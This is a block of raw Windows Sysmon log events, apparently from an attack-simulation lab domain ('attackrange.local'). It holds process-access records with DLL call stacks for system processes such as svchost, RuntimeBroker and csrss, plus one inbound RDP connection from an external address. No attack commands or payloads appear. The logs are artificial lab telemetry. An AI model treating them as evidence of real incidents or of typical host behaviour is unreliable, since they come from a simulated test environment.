08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798
|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.246{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.246{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.208{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.192{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.192{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.161{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x80000000000000001053854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:31.551{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-53520-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000810021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:41.902{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
